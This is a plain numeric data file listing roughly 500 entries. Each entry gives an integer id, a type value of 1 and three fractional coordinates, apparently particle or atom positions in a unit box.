227 1 0.189423 0.361566 0.42961
1749 1 0.289734 0.440618 0.472219
870 1 0.00731032 0.447724 0.140959
1920 1 0.484384 0.725848 0.456255
1477 1 0.385884 0.292508 0.468483
1817 1 0.223615 0.764145 0.463556
279 1 0.447728 0.849595 0.351908
48 1 0.147824 0.478992 0.0642091
1666 1 0.445667 0.719204 0.048945
1084 1 0.370388 0.0459942 0.0195484
1677 1 0.0308556 0.127595 0.491912
642 1 0.00269022 0.261382 0.389449
575 1 0.0764842 0.280944 0.592168
677 1 0.258916 0.999852 0.557436
733 1 0.167467 0.111148 0.527089
423 1 0.490033 0.338344 0.66445
1757 1 0.233121 0.306521 0.530378
1281 1 0.302115 0.309053 0.503703
1070 1 0.255369 0.430037 0.557261
1949 1 0.0326253 0.848204 0.757488
28 1 0.459647 0.743405 0.935253
812 1 0.371776 0.694614 0.523987
936 1 0.485175 0.107116 0.647719
669 1 0.348864 0.431977 0.526193
130 1 0.232444 0.196914 0.520757
559 1 0.108167 0.280377 0.536474
1880 1 0.406092 0.301286 0.56519
1654 1 0.0722855 0.387872 0.540241
1727 1 0.271372 0.379115 0.54063
2045 1 0.0103312 0.401277 0.518723
1186 1 0.493451 0.623336 0.890184
2040 1 0.0750013 0.629953 0.532886
440 1 0.401348 0.645852 0.56444
529 1 0.382455 0.828904 0.992599
1625 1 0.0602854 0.713688 0.554722
187 1 0.203713 0.817572 0.569742
2001 1 0.0258309 0.154666 0.628625
2035 1 0.25445 0.951646 0.509672
1990 1 0.0983837 0.0205114 0.566296
194 1 0.250485 0.201579 0.575489
1581 1 0.359685 0.148187 0.525097
464 1 0.00509045 0.0602321 0.941465
77 1 0.287565 0.321903 0.544631
558 1 0.00323527 0.332022 0.545256
737 1 0.229703 0.388547 0.620307
443 1 0.44385 0.415132 0.539671
1623 1 0.0308288 0.462322 0.533331
1847 1 0.477385 0.497897 0.505882
698 1 0.0385713 0.57957 0.51167
1784 1 0.255055 0.491678 0.559928
1533 1 0.0942919 0.53195 0.999457
469 1 0.175055 0.851761 0.561886
1994 1 0.332638 0.900544 0.565187
295 1 0.446438 0.938246 0.530188
1780 1 0.340802 0.0365339 0.540651
820 1 0.425992 0.988185 0.576573
1535 1 0.344219 0.631867 0.502751
2047 1 0.290333 0.968128 0.528069
844 1 0.436703 0.0155862 0.605087
632 1 0.297231 0.16209 0.559184
197 1 0.229038 0.892999 0.526991
643 1 0.387287 0.260911 0.586142
1323 1 0.0461626 0.304184 0.535757
1629 1 0.0985234 0.276483 0.594469
772 1 0.368458 0.32399 0.580252
1958 1 0.232314 0.431981 0.538976
620 1 0.415712 0.3994 0.559278
342 1 0.168949 0.51713 0.56647
14 1 0.304448 0.541099 0.608928
1707 1 0.348933 0.537653 0.513796
288 1 0.0532734 0.76586 0.937893
1512 1 0.0555424 0.662249 0.54309
361 1 0.442549 0.695828 0.565884
285 1 0.193517 0.716858 0.570757
1233 1 0.232378 0.833549 0.559676
524 1 0.101242 0.962658 0.575465
1976 1 0.27509 0.00226648 0.534603
2011 1 0.0830891 0.103193 0.629067
674 1 0.0890698 0.15318 0.566655
441 1 0.257773 0.188392 0.557734
1534 1 0.368997 0.122727 0.554203
1209 1 0.0769102 0.142522 0.539075
1518 1 0.475596 0.208004 0.767116
1683 1 0.408084 0.516672 0.564892
123 1 0.00978157 0.552974 0.571235
692 1 0.0809418 0.560267 0.652919
1866 1 0.303976 0.582289 0.535541
174 1 0.0239376 0.609317 0.611065
278 1 0.454934 0.851989 0.852332
178 1 0.221643 0.878809 0.991839
874 1 0.392597 0.830339 0.541217
1062 1 0.395693 0.821409 0.644282
1134 1 0.413873 0.895503 0.587731
701 1 0.203394 0.89368 0.552897
176 1 0.217224 0.950823 0.504944
815 1 0.0831457 0.0251029 0.615637
465 1 0.359611 0.0959289 0.55355
164 1 0.346805 0.0422413 0.526077
186 1 0.0306404 0.0844708 0.620187
402 1 0.462483 0.118645 0.645117
581 1 0.160867 0.269514 0.614654
2038 1 0.251284 0.210761 0.58008
1849 1 0.250311 0.266604 0.618892
76 1 0.247429 0.334208 0.606693
1405 1 0.330818 0.33349 0.589582
1418 1 0.354837 0.491963 0.638721
1457 1 0.180838 0.454491 0.617916
1037 1 0.0816751 0.498908 0.577589
225 1 0.153731 0.527458 0.546648
915 1 0.120012 0.564264 0.541671
1371 1 0.429173 0.599877 0.619924
389 1 0.310881 0.733032 0.616665
1863 1 0.346649 0.808093 0.515256
183 1 0.401644 0.833267 0.632713
1722 1 0.481295 0.849458 0.615522
410 1 0.430523 0.0439471 0.588604
1324 1 0.188003 0.195651 0.649081
720 1 0.381143 0.381316 0.621459
204 1 0.439256 0.537644 0.638844
937 1 0.275921 0.567302 0.615149
1093 1 0.355676 0.52991 0.651528
56 1 0.0219862 0.660081 0.6472
102 1 0.44403 0.636679 0.594965
835 1 0.0419238 0.706334 0.558835
886 1 0.139141 0.654555 0.569087
578 1 0.287021 0.682637 0.618867
567 1 0.31804 0.672968 0.632863
70 1 0.204278 0.701479 0.60969
156 1 0.216891 0.729048 0.61682
516 1 0.081506 0.826451 0.60854
1155 1 0.3758 0.864571 0.615074
586 1 0.283426 0.957194 0.614501
527 1 0.160549 0.959446 0.584999
714 1 0.147087 0.0543794 0.667434
171 1 0.295 0.0134993 0.669187
1345 1 0.161322 0.0698578 0.624961
1858 1 0.275639 0.168935 0.698778
868 1 0.499287 0.698393 0.995867
1552 1 0.196141 0.228275 0.637245
491 1 0.334046 0.209448 0.64741
839 1 0.293447 0.310482 0.594277
1413 1 0.311901 0.370389 0.628615
543 1 0.177133 0.403629 0.624317
303 1 0.35714 0.341041 0.630054
364 1 0.331183 0.470557 0.630004
1604 1 0.114704 0.523692 0.685931
339 1 0.331598 0.529501 0.585111
811 1 0.147939 0.837645 0.506564
1559 1 0.138319 0.493678 0.573609
1844 1 0.457249 0.581763 0.604818
1493 1 0.0747355 0.599541 0.662311
1530 1 0.264678 0.711429 0.649702
1761 1 0.0829431 0.787661 0.59818
877 1 0.00610587 0.815162 0.653731
310 1 0.420488 0.790892 0.671164
1440 1 0.176081 0.843056 0.597543
1959 1 0.354845 0.922358 0.636817
857 1 0.391262 0.863161 0.599113
1318 1 0.137091 0.788512 0.619329
1034 1 0.121841 0.953615 0.620204
1532 1 0.486006 0.918283 0.634756
1748 1 0.126388 0.0283147 0.641356
940 1 0.0478688 0.0728403 0.585251
530 1 0.143583 0.203421 0.614232
1075 1 0.280253 0.25926 0.658415
1619 1 0.291478 0.377709 0.635579
65 1 0.094613 0.295871 0.667777
539 1 0.212659 0.35223 0.659043
94 1 0.199541 0.321512 0.628622
1210 1 0.0758591 0.527059 0.606342
747 1 0.465205 0.695308 0.714319
944 1 0.456635 0.685661 0.647102
921 1 0.125294 0.781093 0.638783
1145 1 0.450325 0.741315 0.685254
365 1 0.339064 0.832137 0.635562
805 1 0.22084 0.920044 0.707094
895 1 0.181483 0.962592 0.68719
1278 1 0.200743 0.0486295 0.645233
196 1 0.365838 0.04829 0.641902
42 1 0.392047 0.970318 0.74936
852 1 0.302988 0.0374374 0.6257
442 1 0.480021 0.712892 0.98733
864 1 0.464701 0.317573 0.619343
1243 1 0.162602 0.282627 0.61052
923 1 0.406317 0.231432 0.650619
484 1 0.276613 0.366452 0.739368
994 1 0.161524 0.51628 0.704595
518 1 0.0316675 0.533842 0.668252
2022 1 0.221601 0.45885 0.614641
1584 1 0.48845 0.469327 0.710002
50 1 0.141506 0.499824 0.688194
1558 1 0.12041 0.465086 0.697316
1362 1 0.333099 0.50467 0.659252
1184 1 0.0438038 0.581108 0.672189
884 1 0.336466 0.607653 0.671653
1389 1 0.397072 0.73573 0.627524
866 1 0.101469 0.774712 0.618495
998 1 0.187259 0.90165 0.679542
1274 1 0.395125 0.0353185 0.714855
1665 1 0.104674 0.128742 0.671448
1811 1 0.269216 0.152849 0.736838
40 1 0.0383183 0.283277 0.709809
1557 1 0.169295 0.16375 0.669311
1607 1 0.356236 0.35288 0.669227
1291 1 0.191695 0.303131 0.755357
1388 1 0.168784 0.474763 0.626949
1795 1 0.113574 0.628087 0.720804
172 1 0.0147463 0.577182 0.653082
1458 1 0.0580629 0.622163 0.710272
1952 1 0.378354 0.872128 0.666119
1630 1 0.0969104 0.949797 0.665334
709 1 0.322404 0.935989 0.705065
1840 1 0.298411 0.964006 0.72396
824 1 0.102816 0.176025 0.700663
1692 1 0.21707 0.25539 0.710488
348 1 0.457688 0.772372 0.878956
594 1 0.211424 0.361143 0.720376
646 1 0.105146 0.417151 0.67975
1133 1 0.32991 0.395368 0.766297
1826 1 0.340202 0.651844 0.712184
1593 1 0.331159 0.551118 0.648925
580 1 0.46068 0.669385 0.727918
2010 1 0.377923 0.638108 0.766232
1562 1 0.0269229 0.670267 0.72594
1408 1 0.356524 0.737833 0.748946
1138 1 0.268147 0.781351 0.671383
541 1 0.271304 0.898541 0.711815
1334 1 0.388176 0.845708 0.751552
553 1 0.381234 0.0235798 0.68285
716 1 0.0300912 0.987658 0.695209
965 1 0.13399 0.152286 0.703564
368 1 0.467447 0.09234 0.736396
888 1 0.451335 0.216424 0.74296
1966 1 0.490821 0.176652 0.749565
419 1 0.122983 0.187645 0.686638
506 1 0.421192 0.256402 0.930577
513 1 0.102372 0.279315 0.673126
1175 1 0.38522 0.273825 0.768716
360 1 0.178406 0.412813 0.788099
1213 1 0.372502 0.407359 0.701781
1631 1 0.267787 0.461191 0.770732
425 1 0.320403 0.37588 0.672399
1871 1 0.114741 0.489915 0.753324
779 1 0.182294 0.482413 0.713699
1272 1 0.271083 0.463108 0.677407
2019 1 0.176604 0.574101 0.72174
1671 1 0.156601 0.610332 0.692668
1239 1 0.234199 0.551294 0.587242
1759 1 0.468797 0.549076 0.892668
545 1 0.368095 0.659667 0.733593
327 1 0.0432991 0.757705 0.704694
1308 1 0.330308 0.692175 0.657689
1480 1 0.202437 0.731289 0.707639
1042 1 0.11528 0.785463 0.711581
1538 1 0.141292 0.800946 0.807078
1946 1 0.0597151 0.778448 0.716405
1079 1 0.119783 0.740172 0.781644
1788 1 0.207723 0.809437 0.80232
1818 1 0.022029 0.811417 0.731203
1979 1 0.27478 0.878764 0.73674
1912 1 0.114841 0.839539 0.729329
106 1 0.190723 0.907828 0.755323
2021 1 0.488527 0.0258643 0.757282
325 1 0.210689 0.984991 0.688651
253 1 0.36058 0.0124914 0.729347
704 1 0.0257161 0.113707 0.711703
746 1 0.426882 0.0989511 0.735536
681 1 0.0402183 0.121134 0.760108
1615 1 0.234117 0.188245 0.696735
185 1 0.397671 0.0550492 0.672841
1183 1 0.0999174 0.114625 0.74779
1790 1 0.221087 0.179253 0.771498
1095 1 0.258602 0.425753 0.502096
2042 1 0.264062 0.322045 0.812344
126 1 0.0281514 0.435036 0.783357
403 1 0.261219 0.351755 0.754713
1253 1 0.117159 0.427946 0.743961
2013 1 0.0174202 0.461155 0.695181
215 1 0.287822 0.541431 0.69389
166 1 0.261368 0.456195 0.7461
1086 1 0.365066 0.586774 0.707953
961 1 0.0627226 0.674536 0.720798
1482 1 0.132772 0.623948 0.651266
1429 1 0.306716 0.672846 0.835904
1280 1 0.208371 0.695393 0.73218
152 1 0.265192 0.76954 0.728073
409 1 0.0736518 0.827302 0.721708
1355 1 0.0249224 0.887429 0.695711
902 1 0.377955 0.940467 0.694038
1567 1 0.187687 0.95921 0.770099
1444 1 0.294716 0.974791 0.723387
1943 1 0.325088 0.0450068 0.78189
1669 1 0.348836 0.0919893 0.747681
1094 1 0.336693 0.235126 0.725722
1609 1 0.247946 0.269641 0.731464
252 1 0.482209 0.334466 0.752699
659 1 0.0804963 0.449807 0.776017
1638 1 0.00502934 0.125406 0.684546
1055 1 0.467726 0.67075 0.744962
461 1 0.230682 0.68746 0.785259
604 1 0.276783 0.759673 0.766349
690 1 0.300372 0.764336 0.769842
78 1 0.149176 0.835904 0.750951
1250 1 0.208903 0.949957 0.755785
125 1 0.145008 0.990317 0.701231
487 1 0.168877 0.170742 0.725149
952 1 0.0169291 0.19315 0.801361
318 1 0.0414231 0.284376 0.749816
1027 1 0.0731285 0.421607 0.855271
1465 1 0.23695 0.436579 0.788398
36 1 0.0619823 0.55807 0.72816
1637 1 0.329102 0.648386 0.819112
1798 1 0.309963 0.586334 0.771644
208 1 0.394629 0.692313 0.750525
776 1 0.437146 0.692081 0.766657
1074 1 0.213738 0.650508 0.696966
113 1 0.314254 0.757133 0.753682
346 1 0.371868 0.791655 0.798231
1868 1 0.21023 0.813976 0.81515
798 1 0.4346 0.823068 0.79027
328 1 0.316409 0.892823 0.831406
1262 1 0.172317 0.95639 0.722243
810 1 0.120036 0.921208 0.789295
55 1 0.213089 0.964584 0.778466
1356 1 0.315048 0.906871 0.791689
1890 1 0.0655119 0.986528 0.709717
734 1 0.417312 0.959601 0.74356
964 1 0.3786 0.0816329 0.762664
1691 1 0.330058 0.353284 0.779371
538 1 0.22414 0.478377 0.795027
1338 1 0.247306 0.446762 0.789265
680 1 0.406357 0.542078 0.767602
1335 1 0.122813 0.499221 0.868081
1805 1 0.491389 0.741838 0.62196
1199 1 0.489526 0.685517 0.742591
1848 1 0.421284 0.794692 0.819247
248 1 0.273576 0.924659 0.771594
924 1 0.103226 0.871098 0.851259
1659 1 0.427604 0.971345 0.784733
897 1 0.365461 0.025418 0.841418
636 1 0.378692 0.0288141 0.793192
350 1 0.269541 0.0916809 0.784467
1887 1 0.220999 0.120244 0.856654
1981 1 0.311752 0.22528 0.836285
1982 1 0.342623 0.17833 0.790487
1036 1 0.357099 0.248322 0.792214
880 1 0.0207768 0.342297 0.848148
1923 1 0.0447118 0.573661 0.831809
1597 1 0.0494718 0.674476 0.769581
1836 1 0.475571 0.900367 0.868996
338 1 0.119223 0.775814 0.81681
1453 1 0.0427188 0.805419 0.792582
1588 1 0.10571 0.848462 0.795782
941 1 0.0623577 0.961053 0.862781
522 1 0.479967 0.955084 0.756425
615 1 0.181885 0.999697 0.760917
579 1 0.498505 0.644805 0.976491
1822 1 0.433793 0.0938602 0.768641
483 1 0.222192 0.178171 0.818413
590 1 0.421968 0.15581 0.843893
1102 1 0.219214 0.216979 0.847761
1122 1 0.0703256 0.155692 0.838209
1507 1 0.256963 0.220467 0.851437
250 1 0.0879163 0.283028 0.890794
1332 1 0.188529 0.33439 0.798887
958 1 0.224983 0.221385 0.859189
552 1 0.269762 0.343177 0.849974
894 1 0.384916 0.407017 0.845523
2004 1 0.348841 0.427078 0.774751
1724 1 0.26411 0.517405 0.813714
1711 1 0.202618 0.525558 0.836281
608 1 0.157539 0.58327 0.778495
331 1 0.0363993 0.706016 0.767593
470 1 0.313155 0.761912 0.788826
1928 1 0.241926 0.825712 0.886856
1729 1 0.438814 0.879455 0.844177
4 1 0.356026 0.0196809 0.830791
1159 1 0.445086 0.0292231 0.847421
230 1 0.379024 0.108365 0.864351
234 1 0.456748 0.126013 0.851197
1561 1 0.301978 0.127034 0.841729
2014 1 0.0821132 0.165122 0.845745
1977 1 0.21892 0.145864 0.857874
1214 1 0.425463 0.310348 0.88479
95 1 0.355448 0.208952 0.894541
462 1 0.28287 0.364495 0.854337
447 1 0.356336 0.37828 0.86608
1368 1 0.181475 0.430466 0.936537
1026 1 0.284213 0.54116 0.776698
765 1 0.40506 0.600155 0.853179
500 1 0.189004 0.586983 0.862813
374 1 0.378117 0.667625 0.835578
1188 1 0.099523 0.624863 0.884111
1180 1 0.214952 0.608235 0.836053
1895 1 0.0231202 0.164946 0.898933
257 1 0.249485 0.745982 0.852551
1865 1 0.267394 0.907567 0.907505
451 1 0.0968374 0.850385 0.8084
1517 1 0.43396 0.888451 0.887913
712 1 0.0431944 0.967324 0.851031
525 1 0.093075 0.00401931 0.818374
1112 1 0.256214 0.942625 0.82049
1294 1 0.0574309 0.0766542 0.859345
211 1 0.408586 0.111894 0.927862
267 1 0.448621 0.120691 0.855598
1139 1 0.184846 0.294487 0.837774
1271 1 0.480563 0.708802 0.595601
1828 1 0.229881 0.471651 0.825538
663 1 0.226186 0.599806 0.855617
1846 1 0.161136 0.660703 0.897319
1646 1 0.12915 0.629663 0.855422
695 1 0.273809 0.602239 0.857055
1586 1 0.367709 0.645508 0.889914
554 1 0.0503578 0.655337 0.907723
1800 1 0.13563 0.696174 0.806659
271 1 0.20051 0.765352 0.871839
1676 1 0.430803 0.846304 0.953763
168 1 0.108214 0.898391 0.874442
536 1 0.132568 0.911797 0.79182
1269 1 0.443634 0.799202 0.832916
490 1 0.371365 0.870593 0.824491
117 1 0.112284 0.8811 0.875242
1085 1 0.324568 0.907427 0.858809
1864 1 0.396868 0.117921 0.896645
1284 1 0.170714 0.143372 0.921807
1579 1 0.150447 0.208081 0.916983
2034 1 0.360732 0.172076 0.888904
721 1 0.122417 0.261609 0.876805
840 1 0.266364 0.555312 0.82346
1697 1 0.233885 0.636548 0.986414
463 1 0.114514 0.717497 0.847384
1998 1 0.0184401 0.73796 0.912988
955 1 0.377375 0.722736 0.942505
694 1 0.286938 0.775036 0.892814
1445 1 0.465554 0.983376 0.924371
1190 1 0.49499 0.0869185 0.991635
1484 1 0.425768 0.176288 0.879554
1380 1 0.0826805 0.23729 0.924641
1614 1 0.182277 0.263279 0.896588
497 1 0.170363 0.243225 0.982125
1485 1 0.260893 0.249416 0.907016
147 1 0.0182284 0.333161 0.829597
454 1 0.024606 0.318917 0.890578
449 1 0.111848 0.482632 0.931375
836 1 0.164517 0.634687 0.882711
200 1 0.0824721 0.729881 0.906272
1644 1 0.48812 0.0135437 0.501083
220 1 0.44908 0.772602 0.825345
1764 1 0.138498 0.921525 0.948359
802 1 0.406813 0.81862 0.835894
24 1 0.463736 0.855212 0.863881
728 1 0.287029 0.885196 0.979408
1025 1 0.421771 0.918097 0.888067
341 1 0.0458398 0.023043 0.914149
201 1 0.129785 0.0635084 0.946484
973 1 0.00453342 0.0820409 0.912785
249 1 0.285397 0.0724056 0.895219
437 1 0.0173217 0.256292 0.947631
572 1 0.447968 0.187815 0.924963
791 1 0.341108 0.215608 0.848134
1121 1 0.0731864 0.245087 0.956057
1803 1 0.273728 0.282869 0.953956
1827 1 0.428266 0.528409 0.899082
311 1 0.419391 0.590358 0.929938
1078 1 0.430203 0.660003 0.890406
475 1 0.466111 0.818963 0.896616
647 1 0.405632 0.844426 0.950129
1320 1 0.188453 0.977072 0.97494
1455 1 0.0462681 0.111863 0.983005
871 1 0.230506 0.225812 0.931061
203 1 0.17815 0.343281 0.943171
1275 1 0.0993289 0.347775 0.920416
3 1 0.0384203 0.366062 0.958986
933 1 0.0610227 0.315512 0.949626
179 1 0.0270515 0.44578 0.890296
153 1 0.422722 0.614129 0.948761
1412 1 0.165803 0.6368 0.941763
957 1 0.238767 0.741496 0.950072
1227 1 0.0649406 0.844138 0.934733
1823 1 0.264818 0.813743 0.899511
1996 1 0.347003 0.907922 0.954539
1600 1 0.452773 0.855373 0.982825
1414 1 0.188078 0.993976 0.937361
1673 1 0.294955 0.00174908 0.978573
1081 1 0.289152 0.104934 0.974774
74 1 0.321965 0.143062 0.898454
1908 1 0.0704565 0.134262 0.993753
1205 1 0.247201 0.154539 0.992449
726 1 0.483357 0.209726 0.915
1066 1 0.0948716 0.243661 0.965172
1178 1 0.186262 0.373322 0.980835
629 1 0.342046 0.421843 0.918598
1446 1 0.0362863 0.512026 0.999458
591 1 0.21265 0.502119 0.961035
1430 1 0.451086 0.469691 0.955876
355 1 0.380382 0.502523 0.91301
138 1 0.135599 0.538169 0.977355
1466 1 0.208806 0.583584 0.982899
1170 1 0.35474 0.598949 0.970173
771 1 0.12076 0.626588 0.901191
1295 1 0.425744 0.672805 0.937014
1279 1 0.200149 0.741648 0.965424
1509 1 0.214927 0.865613 0.975682
1523 1 0.337897 0.863645 0.964143
753 1 0.0933359 0.88213 0.970265
294 1 0.459377 0.927928 0.912931
1351 1 0.0397963 0.940025 0.972128
1489 1 0.0270484 0.102886 0.978516
1796 1 0.133855 0.309052 0.52236
83 1 0.482094 0.448453 0.800121
1572 1 0.328068 0.289106 0.984445
1894 1 0.465688 0.55307 0.994278
757 1 0.411301 0.329962 0.954438
995 1 0.197231 0.202367 0.515886
860 1 0.0302582 0.491267 0.950418
1109 1 0.220971 0.565555 0.949923
557 1 0.412595 0.587718 0.999895
792 1 0.143287 0.647853 0.879147
717 1 0.313306 0.632096 0.958489
1428 1 0.478804 0.702797 0.810288
1690 1 0.0750982 0.702038 0.967591
655 1 0.476135 0.615435 0.811931
1164 1 0.203611 0.713439 0.951568
1443 1 0.391704 0.701889 0.982756
830 1 0.426138 0.204546 0.573787
1917 1 0.218418 0.961268 0.98126
1560 1 0.0207443 0.0488822 0.883323
193 1 0.278229 0.950151 0.970187
542 1 0.112572 0.993975 0.93398
1002 1 0.271869 0.27002 0.514514
1399 1 0.0127886 0.495203 0.772405
1237 1 0.31149 0.110101 0.560416
569 1 0.0978785 0.366254 0.969596
190 1 0.466901 0.0956182 0.686854
1359 1 0.227774 0.998764 0.957962
793 1 0.0728785 0.840408 0.536791
233 1 0.134595 0.779549 0.555356
304 1 0.291556 0.642158 0.97528
1349 1 0.29047 0.688369 0.97017
503 1 0.387863 0.879941 0.522576
333 1 0.441571 0.780344 0.993966
353 1 0.234912 0.647467 0.996005
1667 1 0.171067 0.585907 0.952926
1927 1 0.227715 0.951207 0.515356
1569 1 0.227469 0.640648 0.577788
1832 1 0.0257572 0.0224933 0.988704
891 1 0.007808 0.699312 0.734782
705 1 0.129314 0.699057 0.986664
1435 1 0.489698 0.143305 0.510331
1970 1 0.000980483 0.126889 0.611947
1490 1 0.49802 0.819789 0.625328
970 1 0.498516 0.0970357 0.698386
72 1 0.299174 0.91463 0.502339
157 1 0.260243 0.553094 0.999044
260 1 0.323804 0.426528 0.999924
1495 1 0.565674 0.61608 0.0171529
1307 1 0.976099 0.681517 0.462363
942 1 0.892182 0.20467 0.00796108
851 1 0.811603 0.168898 0.0305026
1670 1 0.855321 0.241241 0.0636653
1585 1 0.507193 0.539491 0.339887
499 1 0.986352 0.43161 0.0317778
1089 1 0.567609 0.782662 0.342656
1156 1 0.905462 0.671266 0.0572332
1082 1 0.796503 0.404976 0.0195527
699 1 0.536048 0.485729 0.0583635
1875 1 0.956628 0.937991 0.0160726
1746 1 0.618728 0.981971 0.0675391
1520 1 0.98383 0.358016 0.492781
1257 1 0.549379 0.0874081 0.0651361
1131 1 0.65983 0.943011 0.0219159
383 1 0.790117 0.799782 0.49191
861 1 0.813771 0.14536 0.0366739
1506 1 0.863663 0.197543 0.0970028
1750 1 0.60691 0.448198 0.0280334
480 1 0.772577 0.220977 0.102528
1956 1 0.777326 0.295063 0.0975222
1529 1 0.506337 0.733688 0.315255
1202 1 0.621482 0.347945 0.00710232
1319 1 0.568455 0.827502 0.348222
1367 1 0.979833 0.11601 0.234718
290 1 0.833509 0.624774 0.0560129
974 1 0.929983 0.620018 0.0720764
1919 1 0.715741 0.788002 0.026055
1639 1 0.666276 0.801658 0.0323616
679 1 0.509923 0.0546347 0.122709
711 1 0.882536 0.888581 0.0533114
1874 1 0.932002 0.899749 0.0240172
1013 1 0.957036 0.994053 0.00827783
605 1 0.605294 0.0382728 0.0739511
1141 1 0.657361 0.140114 0.0155398
910 1 0.682683 0.315645 0.0378709
84 1 0.580204 0.438717 0.119437
956 1 0.74677 0.443212 0.0681139
97 1 0.805499 0.36072 0.115803
1566 1 0.530253 0.43247 0.474927
1462 1 0.96144 0.818102 0.353211
431 1 0.961596 0.674932 0.0450191
718 1 0.511232 0.713293 0.0697533
457 1 0.901475 0.757176 0.0150928
1247 1 0.654532 0.703861 0.103743
284 1 0.540221 0.821894 0.109352
1760 1 0.901224 0.938481 0.0495
1583 1 0.663615 0.0816901 0.0741413
121 1 0.537542 0.22412 0.00392897
1127 1 0.703804 0.224661 0.0771876
1813 1 0.656225 0.30124 0.0655726
1650 1 0.778383 0.277901 0.0622316
570 1 0.947266 0.339446 0.110147
740 1 0.626608 0.283139 0.0266692
261 1 0.966636 0.325853 0.116709
1433 1 0.913478 0.349147 0.0579871
1737 1 0.713366 0.367317 0.0748442
1425 1 0.644836 0.391683 0.0295002
1612 1 0.937834 0.420691 0.08249
448 1 0.925432 0.416698 0.0937215
576 1 0.765634 0.440327 0.0865511
1745 1 0.549303 0.637984 0.0671927
1426 1 0.537224 0.614356 0.0739651
226 1 0.801064 0.819281 0.120936
916 1 0.527662 0.84991 0.020519
1224 1 0.879125 0.0314856 0.0724248
767 1 0.623021 0.0382277 0.0382246
1686 1 0.671566 0.272807 0.0829667
672 1 0.74232 0.271023 0.0443162
1090 1 0.853589 0.269312 0.0893587
943 1 0.524018 0.3322 0.0732468
1329 1 0.680389 0.406671 0.0879606
1369 1 0.999605 0.459137 0.0820354
1169 1 0.743143 0.415024 0.071003
2033 1 0.553469 0.141642 0.441588
181 1 0.648799 0.638406 0.0790799
1950 1 0.551538 0.818232 0.0363811
1177 1 0.617251 0.787015 0.0986789
508 1 0.596716 0.807144 0.0642161
1006 1 0.721951 0.817221 0.0116499
610 1 0.555549 0.775873 0.0562259
322 1 0.589821 0.838336 0.0759234
837 1 0.827388 0.819683 0.120128
1599 1 0.50202 0.355147 0.295156
272 1 0.59739 0.962581 0.0676062
2025 1 0.811679 0.0246295 0.0996168
954 1 0.827856 0.059508 0.0873211
1965 1 0.819973 0.120884 0.10662
413 1 0.87415 0.0800487 0.0657678
900 1 0.589414 0.121313 0.164778
1988 1 0.932264 0.245222 0.0769315
515 1 0.945874 0.169072 0.100112
1256 1 0.696877 0.279984 0.105561
1940 1 0.881226 0.402047 0.0570738
1181 1 0.91766 0.463235 0.104846
1773 1 0.56468 0.504379 0.108265
879 1 0.746137 0.494758 0.104131
834 1 0.810827 0.684094 0.108493
534 1 0.644453 0.655638 0.0385744
876 1 0.725825 0.712153 0.126845
27 1 0.750747 0.768174 0.0602768
2016 1 0.7715 0.858692 0.0445574
769 1 0.768146 0.878751 0.109425
887 1 0.637083 0.875035 0.0451988
400 1 0.956876 0.953464 0.0663119
33 1 0.978464 0.877093 0.139219
1622 1 0.677527 0.899404 0.0741306
831 1 0.619454 0.0149487 0.111104
1883 1 0.90414 0.0603879 0.143898
1709 1 0.716836 0.181115 0.0920545
238 1 0.872616 0.188114 0.145638
1816 1 0.716549 0.21347 0.148883
275 1 0.701377 0.328718 0.13239
1096 1 0.569612 0.387873 0.158822
1043 1 0.661706 0.347037 0.128345
62 1 0.625178 0.472419 0.120483
909 1 0.656246 0.443242 0.149434
276 1 0.559034 0.39233 0.0730233
1962 1 0.618754 0.417807 0.0990597
159 1 0.754382 0.524936 0.136168
1969 1 0.978345 0.760942 0.210587
395 1 0.605385 0.533593 0.163683
299 1 0.571684 0.503822 0.121644
2032 1 0.92596 0.48857 0.108974
566 1 0.87817 0.671594 0.136853
652 1 0.660039 0.888655 0.111676
1088 1 0.702302 0.891855 0.102092
1120 1 0.738821 0.960358 0.106231
1018 1 0.50576 0.00701547 0.180976
863 1 0.511942 0.0565912 0.07155
1124 1 0.560779 0.0348071 0.117859
1403 1 0.624612 0.0824853 0.173979
725 1 0.857076 0.133723 0.176665
1809 1 0.556214 0.168774 0.0961129
105 1 0.796174 0.129725 0.176765
1031 1 0.521733 0.0173532 0.493961
68 1 0.594002 0.568255 0.0889067
1252 1 0.774412 0.572584 0.215482
1230 1 0.640537 0.577698 0.18278
1437 1 0.696218 0.647355 0.103406
947 1 0.962912 0.673729 0.122232
489 1 0.862894 0.743139 0.115549
99 1 0.500002 0.718645 0.131204
1008 1 0.581742 0.749689 0.165875
1097 1 0.896615 0.894255 0.0820542
1447 1 0.505052 0.0655828 0.0694447
2037 1 0.957881 0.949021 0.463033
1542 1 0.613584 0.171728 0.119768
784 1 0.615308 0.206284 0.17773
1301 1 0.847298 0.19768 0.147994
343 1 0.744355 0.195885 0.0571676
1215 1 0.659286 0.20851 0.125013
1059 1 0.658411 0.249138 0.118588
617 1 0.739593 0.195655 0.151957
89 1 0.941444 0.261452 0.168747
1092 1 0.747955 0.271558 0.167097
853 1 0.979354 0.375835 0.116386
145 1 0.781665 0.399382 0.267135
882 1 0.940523 0.536708 0.131994
167 1 0.846111 0.586576 0.218771
777 1 0.6011 0.702121 0.200134
1641 1 0.618316 0.813691 0.111427
1841 1 0.663951 0.891464 0.229276
1688 1 0.977367 0.830942 0.127565
749 1 0.954841 0.195244 0.0936713
96 1 0.868854 0.997423 0.156077
1056 1 0.836332 0.944374 0.145587
1299 1 0.920763 0.117668 0.171248
1268 1 0.87526 0.184274 0.12653
385 1 0.823111 0.25169 0.205075
1468 1 0.838994 0.265495 0.13915
1259 1 0.943957 0.338785 0.215399
415 1 0.865581 0.379444 0.171786
1900 1 0.611564 0.472367 0.180268
134 1 0.989923 0.523155 0.0637279
459 1 0.914084 0.556979 0.19462
58 1 0.684628 0.505936 0.0384363
1331 1 0.800127 0.677729 0.253634
797 1 0.573996 0.770715 0.192428
210 1 0.680059 0.754206 0.18506
1930 1 0.57769 0.856456 0.241653
466 1 0.72736 0.722352 0.135438
485 1 0.734843 0.963024 0.162908
1167 1 0.824007 0.92994 0.151346
528 1 0.734205 0.061131 0.227352
654 1 0.955908 0.0259682 0.130243
1486 1 0.816519 0.159322 0.176992
1779 1 0.811805 0.172714 0.210562
1992 1 0.650771 0.278904 0.152539
1633 1 0.967206 0.362053 0.152136
1732 1 0.663946 0.450832 0.168708
597 1 0.872034 0.404706 0.184945
1246 1 0.917576 0.533369 0.192229
1373 1 0.896938 0.45586 0.221639
758 1 0.814414 0.497406 0.237305
1128 1 0.528777 0.512076 0.168363
1696 1 0.810974 0.734978 0.17451
445 1 0.884943 0.675163 0.181587
903 1 0.885373 0.749432 0.169025
929 1 0.873994 0.942832 0.189662
